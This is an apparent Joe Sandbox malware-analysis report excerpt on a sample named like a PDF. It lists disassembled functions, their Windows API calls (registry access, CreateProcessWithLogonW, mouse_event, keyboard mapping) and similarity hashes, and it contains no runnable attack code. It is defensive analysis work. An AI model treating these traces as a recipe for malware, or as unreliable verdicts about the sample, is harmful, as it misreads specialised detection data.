                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 7afe3f1ecaa59b4b3378973c5ffbdf81a4eb4fe7c28378ad1164c50f17378949
                                                                          • Instruction ID: 7e204f2b22a0bbb50bc67781ea972f5704a2e08e3b445fb7c0223fdba9f2b3c9
                                                                          • Opcode Fuzzy Hash: 7afe3f1ecaa59b4b3378973c5ffbdf81a4eb4fe7c28378ad1164c50f17378949
                                                                          • Instruction Fuzzy Hash: 91118EB2150219BEEF159E61CC85EE77F6DEF08758F014115BA04A30A0CB769C21DBA0
                                                                          Function 00B041C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B04292,?), ref: 00B041E3
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B041EA
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00B041F6
                                                                          • DecodePointer.KERNEL32(00000001,00B04292,?), ref: 00B04213
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: 9c68b969f6f9729ed1d0c3107c067d8967177f8a964e578233f578d5431f30d4
                                                                          • Instruction ID: 1a6da2d791bce1f967b2763745e116102a2c3a8ec9364cf0389ecd958d5f6d07
                                                                          • Opcode Fuzzy Hash: 9c68b969f6f9729ed1d0c3107c067d8967177f8a964e578233f578d5431f30d4
                                                                          • Instruction Fuzzy Hash: 54E0E5B0690301AEEB205BB0EC0AB243EE5FBA2B02F108474F521E71E0DFF944919E04
                                                                          Function 00B0429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B041B8), ref: 00B042B8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B042BF
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00B042CA
                                                                          • DecodePointer.KERNEL32(00B041B8), ref: 00B042E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 750fe8156e4105e9373b971e6f7c4a9f5111643f6fe2795e40a71ce6bb1ca5c9
                                                                          • Instruction ID: e9157eb584c491adcac3a3d7083f439ecaff3469c6b83407ebe5474f7d298f2e
                                                                          • Opcode Fuzzy Hash: 750fe8156e4105e9373b971e6f7c4a9f5111643f6fe2795e40a71ce6bb1ca5c9
                                                                          • Instruction Fuzzy Hash: 2DE092B8691202AFEA109B60FE0AB243EA4BB65B42F204064F111F31E0CFF845448A18
                                                                          Function 00B4675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                                                                          • Instruction ID: 285c55adc2f3a765545ee618557bed7944abdec63eccf0af16359ee8ed277110
                                                                          • Opcode Fuzzy Hash: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                                                                          • Instruction Fuzzy Hash: 2A61CE3050069A9BCF15EF25CD81EFE3BE4EF49308F044599F8955B292EB309E45DB51
                                                                          Function 00B6046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60548
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B60588
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B605AB
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B605D4
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B60617
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60624
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: f21804be4d722cc7c369450b1fcd86e465a8ac0371d7e322e09a0876071fa429
                                                                          • Instruction ID: 6e3e6a62db0e9ae5eee215fa94dd02a8968a566e6d14d43324c515be65cec5c5
                                                                          • Opcode Fuzzy Hash: f21804be4d722cc7c369450b1fcd86e465a8ac0371d7e322e09a0876071fa429
                                                                          • Instruction Fuzzy Hash: 33516631218240AFCB14EF65D985E6FBBE8FF88314F04496DF586872A2DB75E904CB52
                                                                          Function 00B65A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenu.USER32(?), ref: 00B65A82
                                                                          • GetMenuItemCount.USER32(00000000), ref: 00B65AB9
                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B65AE1
                                                                          • GetMenuItemID.USER32(?,?), ref: 00B65B50
                                                                          • GetSubMenu.USER32(?,?), ref: 00B65B5E
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B65BAF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                          • String ID:
                                                                          • API String ID: 650687236-0
                                                                          • Opcode ID: 8c5bb79a8ae2605afd6218bae84e3b8157c261e2c46cc79870ddb9ba7d403acf
                                                                          • Instruction ID: fc03bad50c058f8cc4182cf59a3844c900b44655462dfb9eb2bcae35fb003c29
                                                                          • Opcode Fuzzy Hash: 8c5bb79a8ae2605afd6218bae84e3b8157c261e2c46cc79870ddb9ba7d403acf
                                                                          • Instruction Fuzzy Hash: C4519135A00615EFCF21DFA4C945AAEB7F4EF48310F1444A9E941B7391CB74AE41CB90
                                                                          Function 00B3F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B3F3F7
                                                                          • VariantClear.OLEAUT32(00000013), ref: 00B3F469
                                                                          • VariantClear.OLEAUT32(00000000), ref: 00B3F4C4
                                                                          • _memmove.LIBCMT ref: 00B3F4EE
                                                                          • VariantClear.OLEAUT32(?), ref: 00B3F53B
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B3F569
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: a438e34ba837db4dca4a1c0f33b8a945e42f0657fbbdf8a3bb63fee693392ada
                                                                          • Instruction ID: f3c205479d91911df4c8badd95a2d99bd9b227bdda25895f29b0a03cf083dc21
                                                                          • Opcode Fuzzy Hash: a438e34ba837db4dca4a1c0f33b8a945e42f0657fbbdf8a3bb63fee693392ada
                                                                          • Instruction Fuzzy Hash: 90514BB5A0020AAFCB14CF58D884AAAB7F8FF4C354F15856AE959DB350D734E911CFA0
                                                                          Function 00B426F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42747
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42792
                                                                          • IsMenu.USER32(00000000), ref: 00B427B2
                                                                          • CreatePopupMenu.USER32 ref: 00B427E6
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00B42844
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B42875
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 7ee15d0348069d777c49b0939e42490630c103cf007a2728f1f6ef7a0fb8d2e4
                                                                          • Instruction ID: 882715d3c3e3e53f0acc34ccc034f3c221bd32f0302822f17baf0cfb82c06da8
                                                                          • Opcode Fuzzy Hash: 7ee15d0348069d777c49b0939e42490630c103cf007a2728f1f6ef7a0fb8d2e4
                                                                          • Instruction Fuzzy Hash: D8519E70A0020AEBDF25CF68D988BAEBBF5EF54314F5041A9F8119B291D7709E44EB61
                                                                          Function 00AE1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AE179A
                                                                          • GetWindowRect.USER32(?,?), ref: 00AE17FE
                                                                          • ScreenToClient.USER32(?,?), ref: 00AE181B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AE182C
                                                                          • EndPaint.USER32(?,?), ref: 00AE1876
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: 24fb301384d6e68b46fbb3d6180ee8d882baa058602df1dccdcb5924acc55618
                                                                          • Instruction ID: 64a924fbf4e588c4542c9bcb1d584332e989a2c70378e4ccd72548839d55c048
                                                                          • Opcode Fuzzy Hash: 24fb301384d6e68b46fbb3d6180ee8d882baa058602df1dccdcb5924acc55618
                                                                          • Instruction Fuzzy Hash: 8341DB70100351AFC710DF26DC84FBA3BF8EB4A724F140669FAA5872A1CB749845CB61
                                                                          Function 00B6B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(00BA67B0,00000000,01070FB8,?,?,00BA67B0,?,00B6B862,?,?), ref: 00B6B9CC
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00B6B9F0
                                                                          • ShowWindow.USER32(00BA67B0,00000000,01070FB8,?,?,00BA67B0,?,00B6B862,?,?), ref: 00B6BA50
                                                                          • ShowWindow.USER32(00000000,00000004,?,00B6B862,?,?), ref: 00B6BA62
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00B6BA86
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B6BAA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: ccaa7da5f9effefe6e12499ef81fc0fe571c576db0ad77fd250175f3190532e3
                                                                          • Instruction ID: 22caddb13f6d3cd72fc70163555421da4763a498afc8cf6e1d4076af9222395d
                                                                          • Opcode Fuzzy Hash: ccaa7da5f9effefe6e12499ef81fc0fe571c576db0ad77fd250175f3190532e3
                                                                          • Instruction Fuzzy Hash: DC415030600241AFDB25CF94D489FA57BF1FB05314F1842F9EA48CF2A2CB79A885CB51
                                                                          Function 00B573B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00B55134,?,?,00000000,00000001), ref: 00B573BF
                                                                            • Part of subcall function 00B53C94: GetWindowRect.USER32(?,?), ref: 00B53CA7
                                                                          • GetDesktopWindow.USER32 ref: 00B573E9
                                                                          • GetWindowRect.USER32(00000000), ref: 00B573F0
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B57422
                                                                            • Part of subcall function 00B454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
                                                                          • GetCursorPos.USER32(?), ref: 00B5744E
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B574AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 2de930f1899900409145e9d349b007f17d9fdd1995e25f98f36fc1b0e5930ff6
                                                                          • Instruction ID: cf0f587d83e2e92f907f71d90b6899918a3b4bd105741faf2f0dac99a299648c
                                                                          • Opcode Fuzzy Hash: 2de930f1899900409145e9d349b007f17d9fdd1995e25f98f36fc1b0e5930ff6
                                                                          • Instruction Fuzzy Hash: 6131E872508306ABD720DF14E849F6BBBD9FF88314F000959F98597291CB74EE48CB92
                                                                          Function 00B38D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B385F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B38608
                                                                            • Part of subcall function 00B385F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B38612
                                                                            • Part of subcall function 00B385F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B38621
                                                                            • Part of subcall function 00B385F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B38628
                                                                            • Part of subcall function 00B385F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3863E
                                                                          • GetLengthSid.ADVAPI32(?,00000000,00B38977), ref: 00B38DAC
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B38DB8
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B38DBF
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B38DD8
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00B38977), ref: 00B38DEC
                                                                          • HeapFree.KERNEL32(00000000), ref: 00B38DF3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: f13972605876618edad8aad581e49a25c2ff01aa21d6218b44543f632ebb70c2
                                                                          • Instruction ID: 2e370f00a01e7dda8f42715f7c3f994c77f2b09aa12f36609be664ac013593e9
                                                                          • Opcode Fuzzy Hash: f13972605876618edad8aad581e49a25c2ff01aa21d6218b44543f632ebb70c2
                                                                          • Instruction Fuzzy Hash: 2F11AC32500606FFDB109FA8DC09BBE7BA9FF55355F2040ADF945A7290CB76AA04CB61
                                                                          Function 00B38AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B38B2A
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B38B31
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B38B40
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00B38B4B
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B38B7A
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B38B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
                                                                          • Opcode ID: 811197733cc0efffba45abfb7661ff25e2d46d6eddda0535e35fbb9e930649df
                                                                          • Instruction ID: f75f0b12745f326d382d939200e1fa3d9b218a3e24d4e89d97e14a483baf823d
                                                                          • Opcode Fuzzy Hash: 811197733cc0efffba45abfb7661ff25e2d46d6eddda0535e35fbb9e930649df
                                                                          • Instruction Fuzzy Hash: 4D112EB250124AEBDF018F94ED49FEA7BE9EF08304F144065FE04A21A0DB769D609B61
                                                                          Function 00B6C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                            • Part of subcall function 00AE12F3: BeginPath.GDI32(?), ref: 00AE1373
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B6C1C4
                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00B6C1D8
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6C1E6
                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00B6C1F6
                                                                          • EndPath.GDI32(00000000), ref: 00B6C206
                                                                          • StrokePath.GDI32(00000000), ref: 00B6C216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                          • String ID:
                                                                          • API String ID: 43455801-0
                                                                          • Opcode ID: 804c90cf422aebf56c4c1dec0948f23c4740f22b908d6f9f76b5cdb5f4513f89
                                                                          • Instruction ID: 8cd16e08d27883a4dd74c8fe41a46401590a7902ea04cbdbeaf2257261b6db4f
                                                                          • Opcode Fuzzy Hash: 804c90cf422aebf56c4c1dec0948f23c4740f22b908d6f9f76b5cdb5f4513f89
                                                                          • Instruction Fuzzy Hash: 90113C7600010DBFDB019F90EC48EAA3FACEB08390F048021FA08561A1CB759D54DBA0
                                                                          Function 00B003A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B003D3
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B003DB
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B003E6
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B003F1
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B003F9
